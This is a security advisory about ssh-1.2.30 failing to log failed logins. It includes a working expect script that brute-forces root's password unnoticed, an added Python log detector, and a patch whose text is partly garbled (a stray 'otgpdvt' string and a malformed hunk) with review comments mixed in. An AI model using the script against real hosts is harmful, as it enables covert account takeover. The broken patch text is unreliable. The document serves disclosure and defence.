SSH1 SSH daemon logging error

Published: 2001-02-14
Updated: 2001-02-14

Affected systems:

SSH Communications Security ssh 1.2.30

Not affected:

- OpenSSH
- SSH2
Description:

BUGTRAQ ID: 2345
CVE(CAN) ID: CAN-2001-0471

SSH1 is an implementation of the Secure Shell protocol.

The SSH1 daemon has a logging problem that lets an attacker brute-force user passwords without being noticed. After the fourth login attempt the SSH1 logging code no longer records failed connections: the failure messages in sshd.c are emitted through debug() rather than log_msg(), so they never reach syslog unless the daemon runs with debugging enabled (the patch below changes exactly these calls). An attacker can therefore run a dictionary attack while the SSH1 log shows only a handful of attempts. If remote root login is permitted, the attacker may obtain root remotely this way.

<*Source: Jose Nazario (jose@crimelabs.net)
        http://www.crimelabs.net/
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!


#!/usr/bin/expect -f
#
# simple expect exploit to brute force root's password via ssh without
# detection.. see CLABS200101 for info on this exploit.
#
# this is beerware, just buy me a beer at defcon if you like this.
# build your own dictionary, use at your own risk, no warranty, etc.
#
# jose@crimelabs.net  january, 2001
#
# Every guess goes over a fresh ssh connection.  ssh-1.2.30 reports the
# failed password only through debug(), so the target's log shows at most
# one "Connection from ..." line per attempt.

if {[llength $argv] != 2} {
   puts stderr "Usage: $argv0 root@target dictionary\n"
   exit 1
}

set timeout 3                        ;# seconds to wait for each prompt
set target [lindex $argv 0]          ;# e.g. root@victim
set dictionary [lindex $argv 1]      ;# one candidate password per line

set tryPass [open $dictionary r]
set words [split [read $tryPass] "\n"]
close $tryPass

foreach passwd $words {
  if {[string length $passwd] == 0} { continue }   ;# skip blank/trailing lines
  spawn ssh $target
  expect ":"                         ;# the "...password:" prompt
  send "$passwd\n"
  expect "#" { puts "password is $passwd\n" ; exit }   ;# root's shell prompt
  # wrong guess (or timeout): kill this ssh, reap it, try the next word
  exec kill -INT [exp_pid]
  catch {close}
  catch {wait}
}
puts "no password in $dictionary worked against $target"
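The script makes one fresh ssh connection per dictionary word, so even though the wrong passwords are never logged, every guess still costs the target a TCP connection, and SSH1 does report those. What follows is an added example, not part of this advisory and not one of Jose Nazario's tools: a Python detector that works from the connection records alone. It assumes sshd writes a "Connection from <host> port <port>" line per connection and an "Accepted <method> for <user> from <host>" line on success (these message shapes, the regexes built on them and the sample log are constructed for the example, not copied from a real ssh-1.2.30 log), and flags any source that opens many connections in a short window, together with any account it was later accepted as.

```python
"""Spot an SSH password brute force from connection lines alone.

Added example, not part of the NSFOCUS advisory or of Jose Nazario's tools.
Assumed log shapes (constructed for this example, not from a real
ssh-1.2.30 log):
    sshd[PID]: Connection from HOST port N         once per TCP connection
    sshd[PID]: Accepted METHOD for USER from HOST  on a successful login
and nothing at all for a wrong password.  A dictionary run like the expect
script above therefore shows up only as a burst of connections from one
host, so the burst is what we look for.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

TS_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) ")
CONN_RE = re.compile(r"sshd\[\d+\]: Connection from (\S+) port \d+")
ACCEPT_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+)")


def parse_ts(line, year=2001):
    """Syslog timestamps carry no year; pin one so lines can be ordered."""
    m = TS_RE.match(line)
    if not m:
        raise ValueError(f"unparseable timestamp: {line!r}")
    return datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")


def find_bruteforce(lines, threshold=10, window_seconds=300):
    """Return {host: {"connections": n, "accepted_as": [users]}} for every
    host that opened at least `threshold` connections inside some span of
    `window_seconds`.  `connections` is the size of the densest such burst;
    `accepted_as` lists accounts the host was accepted as once the burst
    began (empty: still guessing; non-empty: a guess landed)."""
    window = timedelta(seconds=window_seconds)
    conns = defaultdict(list)    # host -> connection timestamps
    accepts = defaultdict(list)  # host -> (timestamp, user)
    for line in lines:
        ts = parse_ts(line)
        if m := CONN_RE.search(line):
            conns[m.group(1)].append(ts)
        elif m := ACCEPT_RE.search(line):
            accepts[m.group(2)].append((ts, m.group(1)))

    hits = {}
    for host, times in conns.items():
        times.sort()
        best, burst_start, start = 0, None, 0
        # Two-pointer sweep: advance `end`, move `start` up until the span fits.
        for end, t_end in enumerate(times):
            while t_end - times[start] > window:
                start += 1
            if end - start + 1 > best:
                best, burst_start = end - start + 1, times[start]
        if best >= threshold:
            users = sorted({u for t, u in accepts[host] if t >= burst_start})
            hits[host] = {"connections": best, "accepted_as": users}
    return hits


# Constructed sample log (not a capture).  10.0.0.5 is an admin logging in
# normally; 192.0.2.7 runs the dictionary script: twelve connections in one
# minute, then the thirteenth is accepted as root.  No line in it says "failed".
SAMPLE_LOG = [
    "Feb 14 09:00:01 gw sshd[1201]: Connection from 10.0.0.5 port 1022",
    "Feb 14 09:00:03 gw sshd[1201]: Accepted password for alice from 10.0.0.5",
] + [
    f"Feb 14 10:15:{sec:02d} gw sshd[{1300 + i}]: Connection from 192.0.2.7 port {1023 - i}"
    for i, sec in enumerate(range(0, 60, 5))
] + [
    "Feb 14 10:16:05 gw sshd[1312]: Connection from 192.0.2.7 port 1011",
    "Feb 14 10:16:07 gw sshd[1312]: Accepted password for root from 192.0.2.7",
    "Feb 14 11:30:00 gw sshd[1400]: Connection from 10.0.0.5 port 1021",
    "Feb 14 11:30:02 gw sshd[1400]: Accepted password for alice from 10.0.0.5",
]

if __name__ == "__main__":
    for host, info in find_bruteforce(SAMPLE_LOG).items():
        got = ", ".join(info["accepted_as"]) or "nobody yet"
        print(f"{host}: {info['connections']} connections in 5 min, accepted as {got}")
```

Tune `threshold` and `window_seconds` to the host's normal connection rate; an interactive user rarely opens more than a few sessions per minute, while the script above opens one per word. A source that is flagged and then shows an "Accepted" line is the case the description warns about, and the account named there should be treated as compromised.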



Recommendation:

Temporary workaround:

NSFOCUS recommends switching to OpenSSH or SSH2.
Jose Nazario (jose@crimelabs.net) has also provided a patch:
$ diff -Naur ssh-1.2.30/sshd.c.orig ssh-1.2.30/sshd.c
--- ssh-1.2.30/sshd.c.orig      Wed Jan 31 12:11:08 2001
+++ ssh-1.2.30/sshd.c   Wed Jan 31 12:57:36 2001
@@ -2408,7 +2408,7 @@
               remote_user_name = client_user;
               break;
             }
-          debug("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
+          log_msg("Rhosts authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
                 user, client_user, get_canonical_hostname());
           xfree(client_user);
           break;
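Review bot: the Rhosts failure message at line 2408 now reaches syslog carrying client_user, a string chosen by the remote client; if log_msg() does not already strip control characters, a crafted user name can put newlines or terminal escapes into the log that this patch is meant to make trustworthy. Suggest confirming that log_msg() sanitizes its arguments, or passing a filtered copy of client_user here; the RhostsRSA and password messages below take the same input.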
@@ -2469,7 +2469,7 @@
               mpz_clear(&client_host_key_n);
               break;
             }
-          debug("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
+          log_msg("RhostsRSA authentication failed for '%.100s', remote '%.100s', host '%.200s'.",
                 user, client_user, get_canonical_hostname());
           xfree(client_user);
           mpz_clear(&client_host_key_e);
@@ -2500,7 +2500,7 @@
                 break;
               }
             mpz_clear(&n);
-            debug("RSA authentication for %.100s failed.", user);
+            log_msg("RSA authentication for %.100s failed.", user);
           }
           break;
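Review bot: the RSA failure message at line 2500 records only the user, whereas the Rhosts and RhostsRSA messages above also record get_canonical_hostname(); without the source host a run of these lines cannot be tied to one client, which is what the patch is for. Suggest log_msg("RSA authentication for %.100s failed from %.200s.", user, get_canonical_hostname());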

@@ -2633,7 +2633,7 @@
               authenticated = 1;
               break;
             } else {
-              debug("TIS authentication for %.100s failed",user);
+              log_msg("TIS authentication for %.100s failed,otgpdvt",user);
               memset(password, 0, strlen(password));
               xfree(password);
               break;
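Review bot: the + line at 2633 has stray characters in the format string: "TIS authentication for %.100s failed,otgpdvt". The ",otgpdvt" looks like an editing accident and would appear verbatim in every TIS failure record; it should read "TIS authentication for %.100s failed." (with the trailing period the other messages use).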
@@ -2672,7 +2672,7 @@
           if (password_attempts > 0)
             {
               /* Log failures if attempted more than once. */
-              debug("Password authentication failed for user %.100s from %.100s.",
+              log_msg("Password authentication failed for user %.100s from %.100s.",

                     user, get_canonical_hostname());
             }
           password_attempts++;
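Review bot: the if (password_attempts > 0) guard at 2672 is kept, so this line fires only for the second and later password packets on one connection; a client that opens a new connection per guess, as the expect script above does, never triggers it and depends entirely on the message at 2693. Either drop the guard or state in the comment that 2693 is the primary record. Separately, the blank line inside this hunk between the log_msg(...) line and its continuation (user, get_canonical_hostname()) is not valid hunk content (every line must start with ' ', '+' or '-'), so patch will reject the hunk as malformed; remove it or prefix it with a space before applying.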
@@ -2693,7 +2693,7 @@
               authenticated = 1;
               break;
             }
-          debug("Password authentication for %.100s failed.", user);
+          log_msg("Password authentication for %.100s failed.", user);
           memset(password, 0, strlen(password));
           xfree(password);
           break;
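Review bot: with both the 2672 and the 2693 messages promoted to log_msg(), a failed password on a connection that already had one failure appears to produce two syslog lines for one event (the pre-check "Password authentication failed for user ... from ..." and this post-check "Password authentication for ... failed."). If both sit on the same failure path, keep one; if this one is kept, add get_canonical_hostname() as the 2672 message does, since "Password authentication for root failed." with no source host is not actionable.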
           

Vendor patch:

This issue has been fixed in SSH1's CVS.



This advisory was translated and compiled by NSFOCUS (绿盟科技). All rights reserved; do not reproduce without permission.